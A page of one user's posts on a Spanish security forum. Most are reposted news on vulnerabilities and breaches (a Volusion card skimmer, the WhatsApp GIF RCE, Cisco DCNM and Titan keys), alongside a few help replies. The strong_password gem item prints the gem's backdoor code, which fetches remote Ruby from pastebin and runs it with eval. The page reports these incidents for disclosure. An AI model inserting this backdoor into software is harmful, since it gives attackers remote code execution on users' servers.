Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Mensajes - K A I L

Páginas: 1 [2] 3 4 ... 10
21


Los piratas informáticos comprometieron la infraestructura de la plataforma de comercio electrónico basada en la nube Volusion para inyectar a las páginas de pago de los clientes un código JavaScript malicioso que roba datos de tarjetas.

Los atacantes agregaron código para la inyección dinámica del script de robo de datos de la tarjeta a un JavaScript que es parte del software de comercio electrónico Volusion.

Es probable que miles de sitios web carguen el script de los atacantes y envíen información de pago al servidor de los atacantes.

El sigilo es el juego

El investigador de seguridad de Check Point, Marcel Afrahim, descubrió mientras compraba en Sesame Street Live Store, un sitio web de Feld Entertainment que vende productos oficiales de Sesame Street, que el sitio estaba comprometido.

La tienda está construida con Volusion, que incluso proporciona los nameservers. En la página de pago, Afrahim notó la carga de código JavaScript desde Google Cloud Storage (storage.googleapis.com), un servicio web de almacenamiento de archivos para almacenar y acceder a datos en la infraestructura de Google Cloud Platform.

Lo extraño era que este era el único recurso cargado de una fuente que no era 'sesamestreetlivestore.com' o 'volusion.com' sitios web afiliados.

El JavaScript malicioso se llama 'resources.js' y proviene de un bucket llamado 'volusionapi'.



Parece que el atacante fue cuidadoso al nombrar los archivos para que parecieran lo más inocuos posible. Esto se ve respaldado por la descripción del código, que se copió del repositorio de GitHub de Javascript Cookie v2.1.4, una API legítima para manejar cookies.


MageCart script on rocknthreads.com

Sin embargo, el análisis del código revela que el script lee los valores escritos en los campos para información de la tarjeta de crédito, lo codifica en Base64 y lo almacena en el 'sessionStorage' temporal del navegador con el nombre '__utmz_opt_in_out'

A continuación, se filtra a 'volusion-cdn.com/analytics/beacon', el dominio del atacante que se creó para parecer que era parte de la infraestructura de Volusion.

Los nombres de la carpeta están diseñados para hacer que el tráfico parezca un análisis inofensivo o datos de seguimiento web. Aún más, al hacer una solicitud GET al dominio se redirige a un Volusion CDN (red de entrega de contenido) legítimo, señala el investigador.

Sin embargo, una búsqueda whois del dominio muestra que se registró el 7 de septiembre, lo que sugiere que el compromiso se produjo a principios del mes pasado y que los clientes de Volusion pueden haberse infectado en ese momento.



Robar datos de tarjetas de pago de esta manera se conoce como un compromiso de MageCart. RiskIQ notó el primer ataque de este tipo en 2010, pero los incidentes aumentaron recientemente y crecieron en proporciones enormes, con cientos de miles de sitios web infectados con JavaScript que roba datos de tarjetas de pago de las páginas de pago.

Miles de tiendas pueden verse afectadas

La carga del script malicioso en las páginas de los clientes de Volusion se realiza a través del JavaScript 'vnav.js', que se utiliza para navegar por el menú de la interfaz de usuario.

Según su descripción, el archivo es jQuery UI - v1.10.3 y no es específico de una tienda. Miles pueden estar infectados.



El script malicioso cargado por vnav.js estaba ubicado en 'storage.googleapis.com/volusionapi/resources.js' y contenía el script Magecart que robaría la información de pago ingresada en el formulario.



En la página de la compañía, Volusion cuenta con 30,000 comerciantes que utilizan activamente la plataforma. Son de una variedad de campos y la página dedicada muestra a los comerciantes que venden productos en las categorías de indumentaria, hogar y jardín, salud y belleza, automóviles e industria y electrónica. De nuestros cheques, no todos ellos todavía están en el negocio.

Una búsqueda rápida de los dominios que contienen el JavaScript de Volusion contaminado arrojó casi 6.600 resultados. Sin embargo, es posible que no todos estén comprometidos.

Tras los informes de los medios de comunicación y los investigadores de seguridad, Volusion abordó el problema hace unas horas. Antes de eso, Google tomó medidas y mostró la advertencia roja de "peligro de malware" cuando visitaba sitios web que cargaban JavaScript malicioso.

FUENTE

22
Presentaciones / Re:¡Buenas!
« en: Octubre 09, 2019, 09:49:21 am »
Hola @Kay bienvenido a Underc0de!

Por supuesto que por aquí puedes aprender muchísimo, y también son bienvenidos tus aportes, dudas, consultas, etc.

Espero llevarme bien con todos ustedes, muchas gracias.

Es una hermosa comunidad asique no tengo dudas que así sera, te invito a leer las reglas que desde el Staff son pautadas para mantener la armonía en el foro.

Reglas generales del foro [LECTURA OBLIGATORIA]

Saludos!

23


Una imagen vale más que mil palabras, pero un GIF vale más que mil imágenes.

Hoy en día, los cortos clips de bucle, GIF, están en todas partes: en sus redes sociales, en sus chats, ayudando a los usuarios a expresar perfectamente sus emociones, haciendo reír a las personas y reviviendo lo más destacado.

Pero, ¿qué sucede si un saludo GIF de aspecto inocente con un mensaje de Buenos días, Feliz cumpleaños o Feliz Navidad piratea su teléfono inteligente?

Bueno, ya no es una idea teórica.

WhatsApp ha parcheado recientemente una vulnerabilidad de seguridad crítica en su aplicación para Android, que permaneció sin parchear durante al menos 3 meses después de ser descubierta, y si se explotaba, podría haber permitido que los piratas informáticos remotos comprometan los dispositivos Android y potencialmente roben archivos y mensajes de chat.

Vulnerabilidad de ejecución remota de código de WhatsApp

La vulnerabilidad, registrada como CVE-2019-11932, es un error de corrupción de memoria doblemente libre que en realidad no reside en el código de WhatsApp, sino en una biblioteca de análisis de imágenes GIF de código abierto que utiliza WhatsApp.



Descubierto por el investigador de seguridad vietnamita Pham Hong Nhat en mayo de este año, el problema conduce con éxito a ataques de ejecución remota de código, lo que permite a los atacantes ejecutar código arbitrario en dispositivos específicos en el contexto de WhatsApp con los permisos que la aplicación tiene en el dispositivo.

"La carga útil se ejecuta en el contexto de WhatsApp. Por lo tanto, tiene el permiso para leer la tarjeta SD y acceder a la base de datos de mensajes de WhatsApp", dijo el investigador a The Hacker News en una entrevista por correo electrónico.

"El código malicioso tendrá todos los permisos que tiene WhatsApp, incluida la grabación de audio, el acceso a la cámara, el acceso al sistema de archivos, así como el almacenamiento sandbox de WhatsApp que incluye una base de datos de chat protegida, etc."

¿Cómo funciona la vulnerabilidad de WhatsApp RCE?

WhatsApp utiliza la biblioteca de análisis en cuestión para generar una vista previa de los archivos GIF cuando los usuarios abren la galería de su dispositivo antes de enviar cualquier archivo multimedia a sus amigos o familiares.

Por lo tanto, debe tenerse en cuenta que la vulnerabilidad no se activa al enviar un archivo GIF malicioso a una víctima; en su lugar, se ejecuta cuando la propia víctima simplemente abre el Selector de Galería de WhatsApp mientras intenta enviar cualquier archivo multimedia a alguien.



Para explotar este problema, todo lo que un atacante debe hacer es enviar un archivo GIF malicioso especialmente diseñado a un usuario Android objetivo a través de cualquier canal de comunicación en línea y esperar a que el usuario simplemente abra la galería de imágenes en WhatsApp.

Sin embargo, si los atacantes desean enviar el archivo GIF a las víctimas a través de cualquier plataforma de mensajería como WhatsApp o Messenger, deben enviarlo como un archivo de documento en lugar de archivos adjuntos de medios, porque la compresión de imágenes utilizada por estos servicios distorsiona la carga maliciosa oculta en las imágenes .

Como se muestra en una demostración de video de prueba de concepto que el investigador compartió, la vulnerabilidad también se puede explotar para simplemente abrir un shell inverso de forma remota desde el dispositivo pirateado.

Aplicaciones, dispositivos y parches disponibles vulnerables

El problema afecta a las versiones 2.19.230 de WhatsApp y versiones anteriores que se ejecutan en Android 8.1 y 9.0, pero no funciona para Android 8.0 y versiones mas antiguas.

"En las versiones anteriores de Android, el double-free todavía podía activarse. Sin embargo, debido a las llamadas malloc del sistema después del double-free, la aplicación simplemente falla antes de llegar al punto en el que podríamos controlar el registro de la PC". El investigador escribe.

Nhat informó la vulnerabilidad a Facebook, propietario de WhatsApp, a fines de julio de este año, y que la compañía incluyó un parche de seguridad en WhatsApp versión 2.19.244, lanzado en septiembre.

Por lo tanto, para protegerse contra cualquier vulnerabilidad que rodee esta vulnerabilidad, se recomienda actualizar su WhatsApp a la última versión de Google Play Store lo antes posible.

Además de esto, dado que la falla reside en una biblioteca de código abierto, también es posible que cualquier otra aplicación de Android que use la misma biblioteca afectada también pueda ser vulnerable a ataques similares.

El desarrollador de la biblioteca GIF afectada, llamada Android GIF Drawable, también ha lanzado la versión 1.2.18 del software para parchear la vulnerabilidad doblemente libre.

WhatsApp para iOS no se ve afectado por esta vulnerabilidad.

FUENTE

24

En esta ocasión, han sido el especialista Jesse Michael de Eclypsium junto con personal de Intel, quienes han identificado una nueva vulnerabilidad que afecta directamente a la herramienta de diagnóstico del procesador Intel, además de un fallo adicional que afectaría a la seguridad de los Data Center SSD.

La vulnerabilidad relacionada con la herramienta de diagnóstico del procesador, se ha catalogado como CVE-2019-11133 con una puntuación CVSS de 8.2 sobre 10. Dicha vulnerabilidad podría permitir a un usuario autentificado realizar una escalada de privilegios con la que podría acceder a información confidencial o realizar ataques de denegación de servicios (DoS) mediante un acceso local.

Por otro lado, la vulnerabilidad que afectaría a los data center SSD, concretamente a las unidades de las series S4500 y S4600 de Intel, permitiría a un usuario no autentificado escalar privilegios a través de un punto de acceso físico; aunque ha sido puntuada con 5.3 sobre 10 en la escala CVSS, por lo que no se considera crítica.

Intel recibió el reporte y ha podido lanzar los correspondientes parches de seguridad antes del plazo de 90 días para la divulgación pública de vulnerabilidades. Y aunque la compañía ha resuelto alrededor de 25 vulnerabilidades críticas en lo que va de año, el volumen de vulnerabilidades que se está detectando últimamente parece indicar que la estrategia de seguridad de la compañía debería actualizarse.

Fuente https://unaaldia.hispasec.com/2019/07/el-data-centre-ssd-de-intel-podria-permitir-hacerse-con-el-control-completo-de-los-servidores.html

25

Microsoft Office 365 ha sido declarado ilegal en el estado alemán por cuestiones relacionadas con la privacidad. La información de estudiantes y maestros que usan la configuración estándar de Microsoft Office 365 podría estar «expuesta» a las agencias de espionaje de Estados Unidos, según ha dictaminado el Comisionado de protección de datos de ese estado alemán.

El caso que afecta a la suite de productividad en nube de Microsoft (la más popular del mercado en su tipo) es un ejemplo más de las preocupaciones europeas sobre la privacidad de datos y también de la política exterior de la actual administración de Estados Unidos. La decisión de la Oficina de este estado alemán es el resultado de varios años de debate interno sobre si las escuelas alemanas y otras instituciones estatales deberían utilizar el software de Microsoft.

La idea de aumentar la «soberanía digital» está aumentando en Alemania y en toda Europa. Y no solo afecta a Microsoft sino a cualquier tecnológica estadounidense que trabaje en el Viejo Continente. «Tenemos que considerar servicios en nube nacionales y respaldarlos con una financiación realista. La situación política nos está obligando a ello», explicó recientemente un alto funcionario del Ministerio del Interior alemán.

La polémica sobre la privacidad de Office 365 no es nueva. A finales de 2018, investigadores del regulador oficial holandés publicaron un informe donde identificaron una «recopilación de datos personales a gran escala y encubierta» en las suites ofimáticas de Microsoft, Office 2016 y Office 365 de ProPlus.

Microsoft recopila datos con fines «funcionales y de seguridad» en todas sus soluciones de software. Sin embargo, el informe aseguran que ocho apartados descubiertos en la telemetría de Microsoft Office (también de Window 10 Enterprise) incumplirían el nuevo reglamento de protección de datos de la UE, GDPR, y la propia privacidad de los usuarios.

Fuente:
https://www.muyseguridad.net/2019/07/15/microsoft-office-365/

26
Noticias Informáticas / Backdoor descubierto en una librería de Ruby
« en: Julio 15, 2019, 09:11:00 am »

El desarrollador Tute Costa ha descubierto un backdoor alojado en una popular librería (Gem) de Ruby llamada strong_password, utilizada para comprobar la robustez de las contraseñas elegidas por los usuarios.

El código malicioso comprueba si la biblioteca se está utilizando en un entorno de producción, en caso afirmativo descarga y ejecuta un payload desde la plataforma pastebin.com, un conocido repositorio de texto online. Al ejecutarse el payload se crea la puerta trasera en la app o página web dando acceso a la ejecución de código remoto al atacante.

Código: [Seleccionar]
def _!;
  begin;
    yield;
  rescue Exception;
  end;
end

_!{
  Thread.new {
    loop {
      _!{
        sleep rand * 3333;
        eval(
          Net::HTTP.get(
            URI('https://pastebin.com/raw/xa456PFt')
          )
        )
      }
    }
  } if Rails.env[0] == "p"

El backdoor envía la URL de cada sitio infectado a «smiley.zzz.com.ua», quedándose a la espera de nuevas instrucciones, que serán recibidas en forma de cookies, desempaquetadas y ejecutadas a través de la función eval. Esto da acceso al atacante a ejecutar código, con el que sencillamente puede conseguir una terminal en el servidor infectado.

En el momento de reportar el problema al propietario de la biblioteca, descubrió que el atacante presuntamente reemplazó al desarrollador real de la librería en RubyGems, repositorio oficial del lenguaje Ruby. Creó una nueva versión (0.0.7) de la ya existente librería con el backdoor en su interior. Según las estadísticas de RubyGems la librería 537 usuarios descargaron esta versión maliciosa. Además el código fuente de esta nueva versión no fue subido a Github, tan solo fue distribuido a través de RubyGems.

Costas reportó tanto al propietario como al equipo de seguridad de RubyGems y la versión maliciosa fue eliminada del repositorio.

Cualquier proyecto que utilice la citada librería strong_password debería ser revisado exhaustivamente para detectar posibles robos de datos de usuarios u otro tipo de acciones llevadas a cabo por el atacante.

Fuente:
https://unaaldia.hispasec.com/2019/07/backdoor-descubierto-en-una-libreria-de-ruby.html

27
Noticias Informáticas / El lado oculto de Google reCAPTCHA v3
« en: Julio 02, 2019, 09:17:34 am »

Por primera vez en la historia de los CAPTCHAS desaparece la necesidad de que el usuario tenga que introducir un texto ilegible en un campo de verificación, que tenga que marcar esa casilla de «no soy un robot» o peor aún, que tenga que indicar qué imágenes de un mosaico corresponden con la de un gato.

Según explicaban los ingenieros de Google, la nueva versión de reCAPTHA no exige nada al usuario. Se ejecutará en segundo plano, e irá identificando y clasificando automáticamente a los usuarios entre robots o humanos, utilizando un sistema de puntuación basado sobre las pautas de su actividad, elaborando distintos perfiles de riesgo.

Todo esto suena por supuesto estupendamente bien. La navegación se convierte en una experiencia mucho más fluida y transparente y las web que integran el nuevo reCAPTCHA «molestan» menos a sus usuarios. Así que todos ganan: ¿O no?

Pues no está tan claro. Como ya ha denunciado un grupo de expertos en ciberseguridad, lo nuevo de Google tiene una cara mucho menos amable: la intromisión en la privacidad de los usuarios. Para comprender por qué esto es así, lo primero hay explicar cómo funciona este nuevo sistema.

La supercookie de Google

Google como la mayoría de los sitios que visitamos en Internet por primera vez, suele preguntarnos si estamos dispuestos a aceptar sus cookies. Para ellos y para nosotros, es importante. La cookie de Google nos permite entre otras cosas que sus servicios «recuerden» que ya nos hemos autenticado con anterioridad en uno de sus servicios, de modo que no tengamos que introducir nuestro nombre y nuestra contraseña cada vez que los visitamos.

Y hasta aquí bien. Pero por supuesto la cookie de Google hace más cosas, casi todas «inofensivas» hasta ahora. Y decimos hasta ahora, porque lo que denuncian estos investigadores es que para que reCAPTCHA funcione sin necesidad de «interactuar» con el usuario, lo que hace es tomar buena nota de todos sus hábitos de navegación.

De esta forma, si comprueba que navega tal y como lo haría un ser humano, le otorgará un scoring alto y por lo tanto lo considerará digno de confianza. En cambio, si sospecha que no navega tal y como lo haría una persona, el scoring será mucho menor y en este caso el servicio pondrá en marcha otras medidas de autenticación, como puede ser un doble factor.

Esto quiere decir que seamos o no usuarios de los productos de Google, las webs que implementen el nuevo sistema van a «forzar» a sus usuarios a aceptar su cookie tanto si lo quieren como si no. Y esto no son precisamente buenas noticias para los amigos de la privacidad.

Tal y como han comprobado estos investigadores, al utilizar un servicio VPN o la red TOR para acceder a los sitios que han incluido esta medida de seguridad, el sistema responde automáticamente indicando que el visitante es de alto riesgo y o bien impide completamente el acceso o bien pone en marcha otras medidas de autenticación.

En estos momentos, de las 4,5 millones de páginas web que están utilizando el sistema reCaptcha, aproximadamente 450.000 han implementado la última versión de este sistema.

FUENTE

28

La administración de Trump está considerando la prohibición del cifrado de extremo a extremo, una característica adoptada ampliamente en servicios tecnológicos para aumentar la seguridad y privacidad.

Politico menciona una reunión de alto nivel en la Casa Blanca con representantes de varias agencias federales en la búsqueda de una posición común que lleve a la propuesta de un cambio legislativo que podría obligar a las compañías estadounidenses o a las que trabajen en el país a eliminar esta medida de seguridad.

Ya sabes de qué va esto. Bajo el argumento de “aumentar la seguridad” contra el terrorismo y la delincuencia, la administración de Trump no ha encontrado otra fórmula que devolvernos a la edad de piedra tecnológica. La eliminación del cifrado estaría destinada a facilitar el acceso y seguimiento de los dispositivos electrónicos por las fuerzas de seguridad y agencias de espionaje, pero conllevaría dejar los equipos tan abiertos como un queso gruyere.

El cifrado es una herramienta de seguridad en la que nos apoyamos todos los días para evitar que los delincuentes roben nuestras cuentas bancarias, para proteger el control de nuestros coches y aviones de hackeos maliciosos y en general «para preservar nuestra seguridad y bienestar», como afirmó en una declaración el Information Technology Industry Council (ITI), voz global del sector tecnológico que incluye compañías como Apple, Dell, Facebook, Google, Microsoft, IBM, Intel o Twitter. Resumido:

Debilitar la seguridad con el objetivo de promover la seguridad, simplemente no tiene sentido

Las mismas compañías tecnológicas posicionan el cifrado de extremo a extremo como una característica clave de privacidad, y varias de ellas han advertido que cualquier regulación en su contra podría incluso afectar seriamente a la pretendida seguridad nacional, porque dejaría los dispositivos abiertos a ataques como un queso gruyer.

Incluso, hay división entre las mismas agencias federales y la Agencia de Seguridad de Infraestructura y Ciberseguridad está en desacuerdo al conocer la importancia de cifrar datos confidenciales, especialmente en las operaciones de infraestructura crítica.

El ataque mundial con WannaCry, cuya responsabilidad primaria fue de los exploits preparados por la agencia NSA para espionaje masivo, mostró las derivadas que tiene todo este asunto. Por no hablar de la pérdida evidente del derecho a la privacidad si se aprueba una normativa que obligaría a las empresas de alta tecnología, ISPs y proveedores de servicios a entregar todo el contenido de los usuarios en tiempo casi real.

Las fuerzas de seguridad deben contar con herramientas para prevenir los ataques terroristas y la gran delincuencia, y ya tienen medios para hacerlo tutelados por el imprescindible control judicial. La eliminación del cifrado de extremo a extremo no es la solución sino el medio para «impulsar la agenda del Gran Hermano», como critican organizaciones pro-privacidad. Un auténtico disparate que esperemos no se concrete. Con Donald Trump de por medio, espera cualquier cosa.

FUENTE

29

Se han descubierto varias vulnerabilidades en la interfaz web de administración de Cisco Data Center Network Manager (DCNM) que permitirían a un atacante remoto robar la cookie de sesión activa saltándose la autenticación, subir archivos, y como consecuencia ejecutar código remoto como usuario root.

DCNM es el sistema de administración de red para todos los sistemas NX-OS que utilizan el hardware Nexus de Cisco en los centros de datos. Se encarga de solucionar problemas, detectar errores de configuración, etc. Por lo que es una parte importante para las organizaciones que utilizan Nexus switches.

La primera vulnerabilidad descubierta (CVE-2019-1619) permite a un atacante robar la cookie de sesión activa sin necesidad de conocer el usuario administrativo o contraseña. Para ello es necesario enviar una petición HTTP especialmente diseñada a un web servlet especifico que se encuentre en los dispositivos afectados.

Versiones afectadas:
– Cisco eliminó el uso del web servlet afectado en la versión 11.1, por lo que afecta a todas las versiones inferiores a 11.1

Por otro lado, la vulnerabilidad clasificada como CVE-2019-1620 se debe a una configuración incorrecta de los permisos en el software DCNM. Aprovechando este error, un atacante podría crear y escribir archivos mediante el envío de datos a un servlet web específico que se encuentra en los dispositivos afectados. De esta manera es posible incluso ejecutar código remoto con privilegio root.

Versiones afectadas:
– En las versiones inferiores a 11.1 de DCNM les afecta este fallo, pero es necesario autenticarse para aprovechar esta vulnerabilidad.
– En la versión 11.1 de DCNM no es necesario estar autenticado para acceder al servlet web afectado y explotar dicha vulnerabilidad.

En la versión 11.2 Cisco elimina la utilización del servlet web afectado del software, con lo que queda parcheada dicha vulnerabilidad.

Por el momento el equipo PSIRT de Cisco no tienen conocimiento del uso malicioso de estas vulnerabilidades hasta el momento. Cisco también recomiendan actualizar a la última versión, indicando en su página web los pasos a seguir.

Más información:

Cisco Data Center Network Manager Authentication Bypass Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass

Cisco Data Center Network Manager Arbitrary File Upload and Remote Code Execution Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex

FUENTE

30
Dudas y pedidos generales / Re:ayuda con mi scrapy por favor
« en: Junio 28, 2019, 01:38:09 pm »
Hola @lemos.ema probando y haciendo un par de modificaciones a la ayuda que te brindaron
Scraping con BeautifulSoup:
https://jarroba.com/scraping-python-beautifulsoup-ejemplos/
Me tomo 2 segundos obtener 25 resultados (solo tome 3 variables para el scraping, te toca hacer tus propias modificaciones dependiendo que quieres obtener).

Te dejo el codigo por si tienes dudas, solo modifique un poco el que tienes de ejemplo.
Código: (python) [Seleccionar]
# -*- coding: utf-8 -*-

from bs4 import BeautifulSoup
import requests

URL = "https://www.propertyfinder.ae/en/search?c=2&q=&t=&rp=y&pf=&pt=&bf=&bt=&af=&at=&fu=0&kw="

# Realizamos la petición a la web
req = requests.get(URL)

# Comprobamos que la petición nos devuelve un Status Code = 200
status_code = req.status_code
if status_code == 200:

    # Pasamos el contenido HTML de la web a un objeto BeautifulSoup()
    html = BeautifulSoup(req.text, "html.parser")

    # Obtenemos todos los divs donde están las entradas
    entradas = html.find_all('div', {'class': 'card-list__item'})

    # Recorremos todas las entradas para extraer el título, autor y fecha
    for i, entrada in enumerate(entradas):
        # Con el método "getText()" no nos devuelve el HTML
        titulo = entrada.find('h2', {'class': 'card__title card__title-link'}).getText()
ubicacion = entrada.find('p', {'class': 'card__location'}).getText()
precio = entrada.find('span', {'class': 'card__price-value'}).getText()

        # Imprimo el Título, Autor y Fecha de las entradas
        print "%d - %s  |  %s  |  %s" % (i + 1, titulo, ubicacion, precio)

else:
    print "Status Code %d" % status_code

Te recomiendo leas la documentacion de Beautiful Soup.
https://www.crummy.com/software/BeautifulSoup/bs4/doc/#parsing-only-part-of-a-document
Espero te ayude.

Saludos!
K A I L

31
Dudas y pedidos generales / Re:Ayuda con grafica de pc recien montado
« en: Junio 27, 2019, 08:34:26 am »
Invoquemos a @sombra1234 para que nos aclare  ;)

32
Dudas y pedidos generales / Re:Ayuda con grafica de pc recien montado
« en: Junio 27, 2019, 07:58:03 am »
¿Hay que instalar windows y dentro de windows instalar los drivers y conectar la gráfica? gracias.

Hola @sombra1234 el uso de la GPU va a requerir de drivers ya sea para Linux o Windows, deja conectada la GPU a la placa madre pero conecta tu HDMI o VGA a las salidas de video que te provee tu placa madre. Luego de la correcta instalación de drivers recién podrás conectar a las salidas de video de la GPU.

Saludos!
K A I L

33

Microsoft ha introducido una nueva carpeta protegida por contraseña dentro de su servicio de almacenamiento de archivos en línea OneDrive que le permitirá mantener sus archivos sensibles e importantes protegidos y seguros con una capa adicional de autenticación.

Apodado como Personal Vault, solo se puede acceder a la nueva carpeta OneDrive con un paso adicional de verificación de identidad, como su huella digital, rostro, PIN o un código de autenticación de dos factores que se le envía por correo electrónico o SMS.

La carpeta de Personal Vault aparecerá junto a otras carpetas en la aplicación OneDrive como Documentos e Imágenes, pero se bloqueará y le pedirá un código adicional cada vez que intente acceder a ellas a través de la web, la PC o los dispositivos móviles. Manteniéndolos más seguros en caso de que alguien obtenga acceso a su cuenta o dispositivo.

Microsoft sugiere que esta nueva área protegida en OneDrive sería útil para que los usuarios almacenen archivos más confidenciales y personales, como copias de pasaportes, impuestos, documentos de automóviles o del hogar, tarjetas de identificación e información financiera, por ejemplo.

Para almacenar instantáneamente sus archivos en la carpeta de Personal Vault, todo lo que necesita hacer es escanear sus documentos directamente en su Personal Vault a través de la aplicación OneDrive. Incluso puedes tomar fotos y grabar videos con OneDrive y enviarlos directamente a Personal Vault.

Puede almacenar tantos archivos como desee en la carpeta de Personal Vault, hasta su límite de almacenamiento total de OneDrive. Microsoft también está aumentando el plan de almacenamiento básico de OneDrive de 50 GB a 100 GB sin costo adicional.


Personal Vault, de forma predeterminada, incluye todas las protecciones que OneDrive ofrece actualmente, incluido el cifrado de archivos "en reposo" en la nube de Microsoft y en tránsito a un dispositivo, protección contra ransomware, eliminación y recuperación masiva de archivos, monitoreo de actividad sospechosa, análisis de virus de en la descarga, y el historial de versiones para todos los tipos de archivos.

Además, cuando la aplicación OneDrive sincroniza sus archivos de Personal Vault con su computadora, los almacena directamente en un área cifrada con BitLocker de su disco duro local en su computadora con Windows 10, en lugar de en cualquier carpeta normal.

"Para una mayor protección en dispositivos móviles, recomendamos que habilite el cifrado en su dispositivo iOS o Android", dice Microsoft. "Juntas, estas medidas ayudan a mantener sus archivos protegidos, incluso si pierde su PC con Windows 10 o su dispositivo móvil, si es robado o si alguien accede a él".

¿Que más nos ofrece? Después de un período de inactividad (3 minutos en dispositivos móviles y 20 minutos en la web o en el disco duro local de forma predeterminada), el Personal Vault se volverá a bloquear automáticamente y tendrá que volver a autenticarse para obtener acceso nuevamente.

Además, si intenta acceder a OneDrive de forma remota a través de un navegador web en una PC desconocida, el navegador no guardará sus archivos dentro de la caché.

Microsoft está poniendo a disposición la función OneDrive Personal Vault para la versión web, maquinas con Windows 10, así como las aplicaciones móviles iOS y Android.

OneDrive Personal Vault actualmente solo se está implementando en Australia, Nueva Zelanda y Canadá, aunque la compañía lo pondrá a disposición de todos los mercados para fines de año.

FUENTE

34

Los ciberdelincuentes están utilizando un nuevo método para evadir la detección para asegurarse de que no se detecte el tráfico generado por sus campañas maliciosas, una técnica basada en la aleatorización de firmas SSL / TLS y el retraso en el cifrado apodado.

La gran mayoría del tráfico malicioso en Internet, incluidos los ataques contra aplicaciones web, scraping, abuso de credenciales y más, se canaliza a través de conexiones seguras a través de SSL / TLS, dice el Equipo de Investigación de Amenazas de Akamai en un informe publicado hoy.

El informe de Akamai dice que "Desde la perspectiva de un atacante, ajustar el comportamiento del cliente SSL / TLS puede ser trivial para algunos aspectos de la evasión de huellas dactilares, pero la dificultad puede aumentar para otros dependiendo del propósito de la evasión o el bot en cuestión, muchos paquetes requieren profundos niveles de conocimiento y comprensión por parte del atacante para funcionar correctamente ".

Esta técnica es utilizada por los atacantes para evadir la detección y ejecutar sus campañas maliciosas sin interrupciones, con al menos unas pocas decenas de miles de huellas dactilares TLS utilizadas para tales fines antes de que los investigadores observaran el nuevo método de evasión del retraso del cifrado.


Akamai usa el mensaje de saludo del cliente enviado a través de texto claro con cada saludo como parte de las negociaciones de SSL / TLS para la identificación de huellas dactilares, para "diferenciar entre clientes legítimos e imitadores, detección de IP compartida y proxy, y terminadores de TLS".

"Las huellas dactilares de TLS que Akamai observó antes de que se observara el retraso del cifrado se podían contar en decenas de miles. Poco después de la observación inicial, el recuento se elevó a millones de personas y luego se elevó a miles de millones", dice Akamai.

Más importante aún, los delincuentes que usan firmas SSL / TLS para llevar a cabo campañas malintencionadas a través de conexiones seguras han incrementado drásticamente sus esfuerzos últimamente, con firmas aleatorias observadas en instancias de manipulación de TLS que ven un enorme crecimiento entre septiembre de 2018 y febrero de 2019.


De las 18,652 huellas dactilares distintas observadas a nivel mundial por Akamai en agosto de 2018, luego de que las campañas de manipulación de TLS comenzaron a aparecer a principios de septiembre de 2018, alcanzaron un nuevo nivel máximo de 255 millones de instancias a fines de octubre, luego de ataques dirigidos a aerolíneas, bancos y sitios web de citas. que a menudo son objetivos de ataques de relleno de credenciales y raspado de contenido ".

El número de instancias de manipulación detectadas por el equipo de investigación de Akamai a nivel mundial alcanzó un número asombroso de 1.355.334.179 millones de instancias a finales de febrero de 2019.

Los responsables están presentando una lista de conjuntos de cifrado aleatorios en los mensajes de "Cliente", que a su vez, aleatorizan los hashes al final. El análisis adicional nos da la capacidad de perfeccionar y reconocer los detalles importantes de la implementación del atacante. Esto se debe al conjunto relativamente pequeño y finito de las implementaciones de pila SSL / TLS disponibles en la actualidad. Cada uno permite un nivel diferente de intervención del usuario y personalización de la negociación SSL / TLS.

El Equipo de Investigación de Amenazas de Akamai concluye diciendo que "La lección clave aquí es que los delincuentes harán todo lo posible para evitar la detección y mantener sus esquemas. La capacidad de tener una gran visibilidad del tráfico de Internet a través del tiempo entra en juego cuando se trata de una evolución y tácticas de evasión ".

FUENTE

35

Un equipo de investigadores de seguridad de Microsoft descubrió una vulnerabilidad potencialmente grave en la versión compatible con Bluetooth de las claves de seguridad Titan de Google que no se puedo reparar con una actualización de software.

Sin embargo, los usuarios no deben preocuparse, ya que Google ha anunciado que ofrecerá un reemplazo gratuito.

En un aviso de seguridad publicado el miércoles, Google dijo que una "mala configuración en los protocolos de emparejamiento de Bluetooth de Titan Security Keys" podría permitir que un atacante físicamente cerca de su clave de seguridad (~ 9 metros) se comunique con él o con el dispositivo en el que se encuentra su clave.

Lanzado por Google en agosto del año pasado, Titan Security Key es un dispositivo USB de bajo costo que ofrece autenticación de dos factores basada en hardware (2FA) para cuentas en línea con el nivel más alto de protección contra ataques de phishing.

La clave de seguridad Titan, incluye dos claves: una clave de seguridad USB-A con NFC y una clave Bluetooth / NFC equipada con batería y equipada con Micro-USB para la autenticación segura de dos factores.

Según Google, la vulnerabilidad solo afecta a la versión BLE de las claves de seguridad de Titan que tienen un signo "T1" o "T2" en la parte posterior de la misma, y ​​otras claves de seguridad que no son Bluetooth, versiones compatibles con USB o NFC, son seguras de usar .

Google Cloud Product Manager, Christiaan Brand, describe en su blog un posible escenario de ataque:

"Cuando intenta iniciar sesión en una cuenta en su dispositivo, normalmente se le pide que presione el botón en su clave de seguridad BLE para activarlo. Un atacante que se encuentre cerca en ese momento puede potencialmente conectar su propio dispositivo a "su clave de seguridad afectada antes de que su propio dispositivo se conecte. En este conjunto de circunstancias, el atacante podría iniciar sesión en su cuenta utilizando su propio dispositivo si el atacante de alguna manera ya obtuvo su nombre de usuario y contraseña y podría cronometrar estos eventos exactamente".

"Antes de que pueda usar su clave de seguridad, debe emparejarse con su dispositivo. Una vez emparejado, un atacante que se encuentre cerca de usted podría usar su dispositivo para hacerse pasar por su clave de seguridad afectada y conectarse a su dispositivo en el momento que se le solicite para presionar el botón de su tecla. Después de eso, podrían intentar cambiar su dispositivo para que aparezca como un teclado o mouse Bluetooth y posiblemente tomar medidas en su dispositivo ".


Originalmente, Microsoft descubrió la vulnerabilidad y la reveló a Google, así como a Feitian, la compañía que fabrica Titan Keys para Google y también vende el mismo producto (ePass) bajo su propia marca.

Feitian también hizo una divulgación coordinada sobre esta vulnerabilidad el mismo día que Google y está ofreciendo un programa de reemplazo gratuito para sus usuarios.

Como el problema solo afecta al protocolo de emparejamiento de baja energía de Bluetooth y no a la seguridad criptográfica de la clave en sí, Google recomienda a los usuarios afectados que sigan usando sus claves existentes hasta que obtengan un reemplazo.

Google también dice que la clave de seguridad de Bluetooth es aún más segura que apagarla por completo o confiar en otros métodos de autenticación de dos factores como SMS o llamadas telefónicas.

